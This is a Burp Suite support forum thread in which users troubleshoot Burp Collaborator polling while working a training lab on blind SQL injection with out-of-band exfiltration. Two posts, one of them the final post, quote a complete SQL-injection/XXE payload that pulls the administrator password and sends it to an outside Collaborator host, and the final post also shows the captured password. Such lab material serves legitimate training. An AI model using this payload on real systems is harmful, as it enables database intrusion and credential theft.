Burp Suite User Forum

Create new post

Burp Collaborator | 'Poll Now' Function Not Working

Abdurrahman | Last updated: Sep 02, 2020 12:42PM UTC

Hi, I am trying to complete the 'Blind SQL injection with out-of-band data exfiltration' PortSwigger Academy Lab but cannot get the Burp Collaborator Client to work. I have looked at various solutions to this lab online but every time I click on 'Poll Now', nothing happens. The only thing I can think of is that my workplace firewall is interfering. Any ideas as to the RC of this issue or a way to check if the firewall is interfering?

Uthman, PortSwigger Agent | Last updated: Sep 02, 2020 03:23PM UTC

Are you using the instructions provided in the lab? I have just double-checked the lab and everything should be working as expected. If you ping or perform a DNS lookup to the public collaborator server from your workspace, do you receive a response? Can you also try the below? 1. Open the collaborator client in Burp (Burp > Collaborator Client) 2. Copy to clipboard 3. Paste the URL in a browser 4. Poll now Do you see any response to the steps above?

Bittu | Last updated: Dec 29, 2020 07:19AM UTC

Same for me, any suggestions

Liam, PortSwigger Agent | Last updated: Dec 30, 2020 01:52PM UTC

If you ping or perform a DNS lookup to the public collaborator server from your workspace, do you receive a response? Can you also try the below? 1. Open the collaborator client in Burp (Burp > Collaborator Client) 2. Copy to clipboard 3. Paste the URL in a browser 4. Poll now

Crypto | Last updated: Jan 25, 2021 11:35PM UTC

Mine is working in a browser but not working when doing lab. Any solutions?

Liam, PortSwigger Agent | Last updated: Jan 26, 2021 02:42PM UTC

To clarify, what is not working when performing the lab exercise?

Julien | Last updated: Mar 13, 2021 09:04PM UTC

Same for me : I cannot complete the lab even with the solution : When performing the lab, the Poll now button doesn't return any interaction. but when I'm going to the collaborator url, when I click on Poll now, I have an interaction. What's could be wrong ?

Liam, PortSwigger Agent | Last updated: Mar 16, 2021 08:20AM UTC

Have you checked out this video solution? - https://www.youtube.com/watch?v=YTIKBPlPuLA

Vighnesh | Last updated: May 28, 2021 06:24AM UTC

I'm facing the same problem. I inject the payload, click forward, and then go back to the collaborator client and click on "poll now" but nothing shows up. I tried waiting for a couple of minutes as the query is executing asynchronously, but the dns lookup still doesn't show up on the client. It does show up when I try to access it via the browser.

Ben, PortSwigger Agent | Last updated: May 28, 2021 10:35AM UTC

Hi, I have just run through this lab and was able to solve it successfully using the solution provided so it is functioning as expected. Can you provide details of what your payload looks like? Have you altered the payload so that it is reflecting the unique Burp Collaborator payload that you created with the 'Copy to clipboard' action in step 3?

Vighnesh | Last updated: May 28, 2021 02:05PM UTC

Hi, Yes, I did add the unique Burp Collaborator link to the payload. I entered the following payload: '+union+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'Administrator')||'.8cldwglmk699yr1svy0ch5cl9cf33s.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--

Ben, PortSwigger Agent | Last updated: May 28, 2021 02:49PM UTC

Hi, Just to confirm, you have left the Burp Collaborator client window open whilst you have been working on this lab (you have not, for example, closed and reopened it at any point)? Also, have you entered your payload as part of the TrackingId cookie that was obtained from the home page i.e. TrackingId=x'+UNION+SELECT+EXTRACTVALUE..... and then issued this request either by forwarding the intercepted, modified request or sending it via Repeater?

Vighnesh | Last updated: May 28, 2021 03:45PM UTC

Hi, Yes, I did exactly as the solution says. I did not close or reopen the collaborator client at any point.

Ben, PortSwigger Agent | Last updated: Jun 01, 2021 08:02AM UTC

Hi, It might be useful if you send us an email at support@portswigger.net with some screenshots of what you have carried out at each stage of the solution so that we can take a look for you.

Amandine | Last updated: Jun 10, 2021 12:14AM UTC

I seem to have the same problem. That does not work for me neither and I did what the guy shown in the video... Nothing happens when I click Poll now.

Amandine | Last updated: Jun 10, 2021 12:14AM UTC

I seem to have the same problem. That does not work for me neither and I did what the guy shown in the video... Nothing happens when I click Poll now.

Ben, PortSwigger Agent | Last updated: Jun 10, 2021 07:19AM UTC

Hi, Are you able to provide us with some details of the steps that you have taken to solve this lab so far so that we can try and assist you further?

0xGodson | Last updated: Jan 17, 2022 07:57PM UTC

Hi, I am facing the same issue. I pasted my burp colab. client url in browser, its showing the response. it is working well. but my collab. client is not showing the hits.

0xGodson | Last updated: Jan 17, 2022 07:58PM UTC

i am using burp pro, version 2021.10

Babu | Last updated: Jan 18, 2022 06:16AM UTC

Same Issue, colab url showing response in browser but not polling. I am using Burp pro, version 2021.12.1

Babu | Last updated: Jan 18, 2022 06:16AM UTC

Same Issue, colab url showing response in browser but not polling. I am using Burp pro, version 2021.12.1

Babu | Last updated: Jan 18, 2022 06:21AM UTC

This is the following error when running a health check. "No connections to the polling server at polling.burpcollaborator.net could be opened. The collaborator will not work in this configuration."

0xGodson | Last updated: Jan 18, 2022 08:41AM UTC

As i said before. This is my issue watch this! https://www.youtube.com/watch?v=amqlYkQQE5s

Ben, PortSwigger Agent | Last updated: Jan 18, 2022 08:45AM UTC

Hi all, We are aware of an issue with the public Collaborator server and are currently investigating - we will update this thread when we have some further news to share.

Ben, PortSwigger Agent | Last updated: Jan 28, 2022 10:28AM UTC

Hi all, Apologies for the delay - we believe that this should now be much improved. If are still having specific issues then please let us know.

Michael | Last updated: Feb 03, 2022 09:05PM UTC

Burp Collaborator is not working for me either I'm on version 2021.12.1 do u have any trouble shooting ideas ? mancusomjm@gmail.com

Michael | Last updated: Feb 03, 2022 09:05PM UTC

Burp Collaborator is not working for me either I'm on version 2021.12.1 do u have any trouble shooting ideas ? mancusomjm@gmail.com

Ben, PortSwigger Agent | Last updated: Feb 04, 2022 08:12AM UTC

Hi Michael, Our connectivity tests to the public Burp Collaborator are all passing successfully so there does not appear to be a general issue as of this precise moment. If you run a health check, via Project options -> Misc -> Burp Collaborator Server -> Run health check, are you seeing some of the connectivity tests failing?

Michael | Last updated: Feb 04, 2022 09:34PM UTC

I checked my burp ( 2021.12.1 ) and I dont have a Misc option under Project Options A picture of how my Burp looks is here https://drive.google.com/file/d/1zWoA2d22rhDKmeeqZ5m-FNBc5YnsKZYA/view?usp=sharing

Ben, PortSwigger Agent | Last updated: Feb 07, 2022 08:25AM UTC

Hi Michael, 'Project options' is a tab rather than a menu item (in the screenshot that you provided, it is on the bottom row of tabs to the right hand side of the screen). If you could access the Collaborator health check from within this tab (as described above) and let us know the results then that would be useful.

Michael | Last updated: Feb 08, 2022 07:48PM UTC

Thank you for the heads up I attached another screen shot here in the link below only 2 green Success. and a polling server connection error https://drive.google.com/file/d/1WvJkrbzlYkdyWdyH3Fx3FYOmfu1R9BlR/view?usp=sharing

Ben, PortSwigger Agent | Last updated: Feb 09, 2022 08:42AM UTC

Hi Michael, If you open up the Burp Collaborator Client (via the Burp -> Burp Collaborator Client menu item) and then click the 'Copy to clipboard' button within the resulting Burp Collaborator client window this should generate a collaborator payload for you (the payload should consist of a random string of alpha-numeric characters followed by .burpcollaborator.net). If you then paste this payload directly into a browser do you receive a response? If you then return to the open Burp Collaborator Client and click the 'Poll now' button do you also see some interactions appear within the client? As noted previously, the internal tests that we run on the health of the public collaborator server are still passing as of right now so we do not appear to have any general issues.

David | Last updated: Feb 14, 2022 07:40PM UTC

Hi Ben, I am running into the same issues as described by the other above users. I saw your comment about using the "Run health check ..." tool on the Burp Collaborator Server. This is the results I received - Initiating health check Server address resolution Success Server HTTP connection Success Server HTTPS connection (trust enforced) Warning Server HTTPS connection (trust not enforced) Success Server SMTP connection on port 25 Warning Server SMTP connection on port 587 Warning Server SMTPS connection (trust enforced) Warning Server SMTPS connection (trust not enforced) Warning Polling server address resolution Success Polling server connection Error An HTTPS connection to the capture server at r3v1yn1il93tt7h1i9lehd7a71derxbffi4.burpcollaborator.net could not be opened. An SMTP connection to the capture server at r3v1yn1il93tt7h1i9lehd7a71derxbffi4.burpcollaborator.net port 25 could not be opened. An SMTP connection to the capture server at r3v1yn1il93tt7h1i9lehd7a71derxbffi4.burpcollaborator.net port 587 could not be opened. An SMTPS connection to the capture server at r3v1yn1il93tt7h1i9lehd7a71derxbffi4.burpcollaborator.net could not be opened. Communication using other protocols did work; possibly a firewall is preventing this connection. No connections to the polling server at polling.burpcollaborator.net could be opened. The collaborator will not work in this configuration.

Ben, PortSwigger Agent | Last updated: Feb 15, 2022 09:27AM UTC

Hi David, As of this moment, our internal tests are all passing for the public Burp Collaborator - are you still seeing this particular issue right now?

David | Last updated: Feb 15, 2022 04:14PM UTC

Hi Ben, I just ran the health check again and it came up with the same issues. There are others on my team experiencing the same problem. For the last month or so, I have been running into this issue where the polling function is not working and based off the comments above, I'm not the only one. I am using v2022.1.1

David | Last updated: Feb 15, 2022 04:14PM UTC

Hi Ben, I just ran the health check again and it came up with the same issues. There are others on my team experiencing the same problem. For the last month or so, I have been running into this issue where the polling function is not working and based off the comments above, I'm not the only one. I am using v2022.1.1

Ben, PortSwigger Agent | Last updated: Feb 16, 2022 02:14PM UTC

Hi David, We re-architected the public Burp Collaborator fairly recently (blog post here if you are interested - https://portswigger.net/blog/a-modern-elastic-design-for-burp-collaborator-server) and we spent a period of time fine tuning this new setup (which led to some general connectivity issues, as experienced by some other users earlier in this forum thread). We do monitor the public Collaborator server and, as noted earlier, we are not seeing any major or long standing issues at this current time. If you and your colleagues have been experiencing problems for over a month then it would seem likely that there is something more amiss here. Are you able to carry out the troubleshooting steps that I listed earlier in the forum thread, as detailed below: If you open up the Burp Collaborator Client (via the Burp -> Burp Collaborator Client menu item) and then click the 'Copy to clipboard' button within the resulting Burp Collaborator client window this should generate a collaborator payload for you (the payload should consist of a random string of alpha-numeric characters followed by .burpcollaborator.net). If you then paste this payload directly into a browser do you receive a response? If you then return to the open Burp Collaborator Client and click the 'Poll now' button do you also see some interactions appear within the client?

David | Last updated: Feb 16, 2022 03:41PM UTC

Hi Ben, I think I figured it out. I was looking in the Burp Collaborator Server settings and noticed that there is a checkbox option for "Poll over unencrypted HTTP". I'm guessing this might be unchecked by default. Thanks for your help!

Asritha | Last updated: Feb 22, 2022 08:55PM UTC

I'm receiving the below error message while accessing through browser when I copied burp collaborator client clipboard. Error Failed to connect to rje63zcwv29oa4s5ovr7zrn8wz2qqf.burpcollaborator.net:80 Also , I have run a health check on burp collaborator server and I have the box for poll over unencrypted http checked. Initiating health check Server address resolution Success Server HTTP connection Warning Server HTTPS connection (trust enforced) Warning Server HTTPS connection (trust not enforced) Warning Server SMTP connection on port 25 Warning Server SMTP connection on port 587 Warning Server SMTPS connection (trust enforced) Warning Server SMTPS connection (trust not enforced) Warning Polling server address resolution Success Polling server connection Error No connections to 2227tamzhearmmjf679m2pxrwi2vge0w4zt.burpcollaborator.net could be opened. The collaborator may still work, as long as the server under test can connect to this port. No connections to the polling server at polling.burpcollaborator.net could be opened. The collaborator will not work in this configuration.

Ben, PortSwigger Agent | Last updated: Feb 23, 2022 09:30AM UTC

Hi Asritha, Do you have any restrictions in place in your environment that might be impacting on your outbound connectivity?

Asritha | Last updated: Feb 23, 2022 01:11PM UTC

Ben, The restrictions doesn't impact my outbound connectivity. As I have checked in another system which is working fine without any issues.

Ben, PortSwigger Agent | Last updated: Feb 23, 2022 02:08PM UTC

Hi Asritha, Can you reach http://burpcollaborator.net in a browser?

pyumi | Last updated: Mar 02, 2022 02:05AM UTC

I ran into a different issue with the Burp Collab Client. Polling wasn't working and I couldn't PING or Browse to the Collab server location. It turns out for DNS was an issue for me. I was using my WiFi router and upstream ISP for DNS but for some reason the Collab server locations were resolving as 127.x.x.x IP Addresses. I ended up changing my DNS to point to Google (8.8.8.8) and Cloudflare (1.1.1.1) public DNS servers and everything is working fine now. This might be the same issue that Asritha is running into. I ran the Burp Collab Health Check using old DNS server and received the same warning messages. When I switched to the public DNS servers, all the health checks ran successful.

Hana | Last updated: Dec 30, 2022 01:46PM UTC

Hello everyone, I had the same problem and I wasted 3 hours trying to make collaborator work. Collab worked with some other lab, it worked when I pasted the URL in the browser, Health Check was OK too. I solved the problem with changing the settings: Burp -> Settings -> Collaborator -> Checking Poll Over Unencrypted HTTP (It was unchecked before) I hope that helps.

Michael | Last updated: Dec 15, 2023 02:21AM UTC

Hi everyone, I had the same problem and I've SOLVED THIS PROBLEM for your reference. (Burp Suite Professional V2023) 1, Copy blow to repeater which comes from solution of Lab: Blind SQL injection with out-of-band data exfiltration '+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual-- 2, Collaborator, copy to clipboard, then paste in repeater, instead of 'BURP-COLLABORATOR-SUBDOMAIN', for my example is w413n6wggnxescy0475u64ee056zupie.oastify.com it looks like below '+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.w413n6wggnxescy0475u64ee056zupie.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual-- then click send, after it responded ok, click 'poll now' and paste that URL again to your browser and ENTER, now you will find payload details in collaborator. NOTE: I forgot which one is first between click send operation and click poll now operation. 3, A HTTP type payload will show at 'Request to Collaborator' panel, in my example, it shows like ' HGET / HTTP/1.0 Host: 7mhe4vi8qet7av4kjncb.w413n6wggnxescy0475u64ee056zupie.oastify.com Content-Type: text/plain; charset=utf-8 ' Now you get the password is 7mhe4vi8qet7av4kjncb

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.